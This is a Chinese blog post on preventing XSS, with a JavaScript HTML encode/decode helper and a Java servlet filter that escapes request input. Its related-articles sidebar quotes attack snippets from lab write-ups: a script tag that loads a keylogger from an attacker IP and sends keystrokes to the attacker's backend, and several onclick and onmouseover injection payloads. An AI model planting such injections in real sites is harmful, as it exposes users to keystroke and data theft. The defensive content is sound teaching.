一次解决防止xss攻击的记录

最新推荐文章于 2022-09-09 15:22:45 发布
最新推荐文章于 2022-09-09 15:22:45 发布
阅读量632 收藏 1
点赞数
分类专栏: 杂记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhf852963/article/details/106544530
版权

XSS简介:

       XSS(Cross Site Scripting),跨站脚本攻击,是一种允许攻击者在另外一个用户的浏览器中执行恶意代码脚本的脚本注入式攻击。本来缩小应该是CSS,但为了和层叠样式(Cascading Style Sheet,CSS)有所区分,故称XSS

       简单的说就是在互联网的环境下,用户进行新增操作时,输入了类似<script>alert(0)</script>的脚本语言。会导致程序在解析这种脚本语言时发生乱套的情况。

解决方式一:通过前端代码解决

       解析用户输入的数据,将一些<script>等特殊字符进行转码操作,等到需要显示的时候再把数据进行html解码操作,转码和解码的方法如下所示,ajax提交时,提交的参数格式为HtmlUtil.htmlEncode(参数值)。界面返回赋值的参数格式为HtmlUtil.htmlDecode(参数值)。

       需要注意的是,在查询界面需要将查询框的参数也要进行转码操作,因为数据库存的是转码的格式,要统一。

var HtmlUtil = {
		/*1.用浏览器内部转换器实现html转码*/
		htmlEncode : function(html) {
			//1.首先动态创建一个容器标签元素,如DIV
			var temp = document.createElement("div");
			//2.然后将要转换的字符串设置为这个元素的innerText(ie支持)或者textContent(火狐,google支持)
			(temp.textContent != undefined) ? (temp.textContent = html)
					: (temp.innerText = html);
			//3.最后返回这个元素的innerHTML,即得到经过HTML编码转换的字符串了
			var output = temp.innerHTML;
			temp = null;
			return output;
		},
		/*2.用浏览器内部转换器实现html解码*/
		htmlDecode : function(text) {
			//1.首先动态创建一个容器标签元素,如DIV
			var temp = document.createElement("div");
			//2.然后将要转换的字符串设置为这个元素的innerHTML(ie,火狐,google都支持)
			temp.innerHTML = text;
			//3.最后返回这个元素的innerText(ie支持)或者textContent(火狐,google支持),即得到经过HTML解码的字符串了。
			var output = temp.innerText || temp.textContent;
			temp = null;
			return output;
		}
};

       现在的效果,在table表格浏览器可以正常显示名字,但是在输入框内也可以正常显示名字,但是有时候下拉菜单会出现转义后的名称。

       缺点就是,若界面比较多,需要改的地方就比较多。

 

解决方式二:通过后端代码解决

       和前端解决的方式类似,配置一个过滤器,将一些特殊字符进行转码操作后再存储到数据库中,若用户输入的是<script>alert(0)</script>,那么数据库存储的就是 &lt;script&gt;alert(1)&lt;/script&gt;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;

import org.apache.commons.lang3.StringEscapeUtils;

public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {  
	  
    public XssHttpServletRequestWrapper(HttpServletRequest request) {  
        super(request);  
    }  
  
    @Override  
    public String getHeader(String name) {  
        return StringEscapeUtils.escapeHtml4(super.getHeader(name));  
    }  
  
    @Override  
    public String getQueryString() {  
        return StringEscapeUtils.escapeHtml4(super.getQueryString());  
    }  
  
    @Override  
    public String getParameter(String name) {  
        return StringEscapeUtils.escapeHtml4(super.getParameter(name));  
    }  
  
    @Override  
    public String[] getParameterValues(String name) {  
        String[] values = super.getParameterValues(name);  
        if(values != null) {  
            int length = values.length;  
            String[] escapseValues = new String[length];  
            for(int i = 0; i < length; i++){  
                escapseValues[i] = StringEscapeUtils.escapeHtml4(values[i]);  
            }  
            return escapseValues;  
        }  
        return super.getParameterValues(name);  
    }  
}  
import java.io.IOException;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;

import org.springframework.context.annotation.Configuration;

@Configuration
public class XssFilter implements Filter {
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
    }
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest)servletRequest;
        filterChain.doFilter(new XssHttpServletRequestWrapper(request),servletResponse);
    }
    @Override
    public void destroy() {
    }
}

       现在的效果,在table表格浏览器可以正常显示名字,但是在输入框内就无法正常显示名字了,这个属于正常现象

 

快乐的小三菊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
web安全之XSS攻击原理及防范(1),2024年最新网络安全高级开发面试题以及答案
jixuczy的博客
04-15 703
HTML编码一样,html中的属性也要进行编码,比如 这样的,name是input的属性,因此在html解析时,会对name属性进行编码,因为假如{name} 的值为:" " οnclick=“alert(‘属性XSS’)” " " 这样的,也就是说input变成这样的了,,input属性name被插入onclick事件了,因此也需要针对这种常规的html属性,都需要对其进行HTML属性编码。mode=block;
xss攻击类型与防止xss攻击解决方案
08-05
## 防止XSS攻击解决方案 1. **输入验证(Input Validation)** 对用户提交的数据进行严格的验证,限制特定字符,如JavaScript注释和特殊字符,并对数据进行编码或转义,以防止它们被当作HTML或JavaScript执行。 ...
xss攻击记录用户按键实验
weixin_43726152的博客
05-12 442
目标主机:win10 192.168.56.133 攻击主机:win10 192.168.56.132 0x0:在有xss漏洞的的网页上写下 <script src="http://192.168.56.132/pika/pkxss/rkeypress/rk.js"></script> 0x1获取用户的按键,发送到攻击者的后台 主要功能就是获取用户的按键:String.fromCharCode(event.keyCode); 然后再异步发送到攻击者的后台http://192.168
42. 记一次搜索框历史记录中的XSS
__Qian的博客
03-23 1204
1.这里的XSS存在于历史记录中,首先在搜索框中输入xss语句:<input value="" οnclick=alert(‘xss’) type=“text”>,但是新打开链接后,页面载入出错 2.返回查看搜索记录,点击搜索记录的搜索框,即可弹窗 注:这里使用其他的语句也可弹窗: <input name="name" value="" onmouseover=promp...
[前端]防止xss攻击的最简单方法
热门推荐
jsh0123的博客
04-11 2万+
xss攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。(解释摘自百度百科) 1、将能被转换为html的输入内容
PHP htmlspecialchars不能防御前端innerHTML产生的XSS注入
weixin_34232617的博客
02-28 408
为什么80%的码农都做不了架构师?>>> ...
JSP Struts过滤xss攻击解决办法
10-19
配置完成后,Struts2会自动在每个Action调用前执行`XssInterceptor`,对所有请求参数进行HTML实体编码,防止XSS攻击。 **4. XSS转码库** 在上述示例中,我们使用了Apache Commons Lang的`StringEscapeUtils`类来...
记录一下Velocity防Xss攻击
08-14
`EscapeRequestReference.java`这个文件名暗示了一个关于请求参数转义的功能,这通常是防止XSS攻击的第一步。在处理用户提交的数据时,开发者需要确保所有可能包含用户输入的变量都经过了适当的转义。例如,可以使用...
xssprotect防止XSS攻击源码
08-27
针对这种威胁,开发人员通常会采取一些防御措施,其中“xssprotect”就是一种用于防止XSS攻击解决方案。以下将详细讲解“xssprotect防止XSS攻击源码”的相关知识点。 首先,XSSProtect通常会采用过滤器(Filter)...
防止SQL注入和XSS攻击Filter
06-03
通过这种方式,可以实现如身份验证、日志记录、编码转换等功能,同时也可以用来实现对输入数据的清洗,以防止SQL注入和XSS攻击等安全问题。 #### 三、代码解析 ##### 1. XssFilter类 ```java public class Xss...
给开发者的终极XSS防护备忘录.pdf
09-07
XSS 或者说跨站脚本是一种 Web 应用程序的漏洞,当来自用户的不可信数据被应用程序 在没有验证以及反射回浏览器而没有进行编码或转义的情况下进行了处理,导致浏览器引 擎执行了代码。 XSS 类型 • 反射型 XSS • 存储型 XSS • DOM XSS • 突变XSS 反射型 XSS 反射或者非持久型 XSS 是当不可信的用户输入被服务器在没有任何验证下处理并在没有编 码或转义的情况下反射回响应文中,导致代码在浏览器执行的一种 XSS 漏洞。
处理XSS攻击的调研和落地方案
11-17
2. **Content Security Policy (CSP)**:设置CSP策略可以限制浏览器只执行来自特定源的脚本,有效防止XSS攻击。在SpringBoot中,可以使用`HttpHeaders`类添加CSP头。 3. **使用HTTPOnly Cookie**:设置HTTPOnly标志...
简单模拟XSS攻击.zip
07-05
通过这个项目,你可以学习到如何构建一个基础的Web应用,理解XSS攻击的原理,并学习如何在后端验证和清理用户输入,防止此类攻击的发生。同时,这也是一个很好的实践平台,加深对Node.js、Express以及JavaScript安全...
SQL注入和XSS跨站攻击安全规范1
08-08
【SQL注入】 SQL注入是一种常见的网络安全...综上所述,防止SQL注入和XSS攻击的关键在于对用户输入进行严格的控制和验证,以及采用安全的编程习惯。通过遵循上述规范和实践,可以显著降低Web应用遭受此类攻击的风险。
discuz X25 某功能存在 xss漏洞以及解决方案
09-28
6. 使用Web应用防火墙(WAF)来防止XSS攻击。WAF可以作为最后的防线,即使在某些漏洞未被发现的情况下,它也能对很多攻击进行拦截。 对于discuz X25广播回复功能的XSS漏洞,同样需要对广播回复的处理过程进行彻底的...
【转】XSS攻击及防御
05-08 170
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它...
Java利用拦截器处理XSS漏洞
sunon_的博客
04-29 3405
Java利用拦截器处理XSS漏洞 当应用程序的新网页中包含不受信任的、未经恰当验证或转义的数据时,或者 使用可以创建 HTML 或 JavaScript 的浏览器 API 更新现有的网页时,就会出 现 XSS 缺陷。XSS 让攻击者能够在受害者的浏览器中执行脚本,并劫持用户 会话、破坏网站或将用户重定向到恶意站点。 在表单提交或者 url 参数传递前,对需要的参数进行过滤; 2.过滤用户输入的 检查用户输入的内容中是否有非法内容。如<>(尖括号)、” (引号)、 ‘(单引号)、%(百分比符号
XSS过滤器的实现
weixin_33834679的博客
03-18 983
一、XSS是什么   全称跨站脚本(cross site script)XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 比如在input框中填写了可以执行的javascript脚本,而后台并没有做过滤与校验。 二、过滤器是什么   过滤器,顾名思义过滤某种物质的设备,在Java中用...
XSS攻击,使用Filter转义
最新发布
熊浪的博客
09-09 850
Filter转义后的特殊字符,如果需要直接使用可以通过 XssFilter.XssHttpServletRequestWrapper.unescapeHtml(value)还原,入库和传给前端用转义后的字符串,前端自行还原。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

快乐的小三菊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值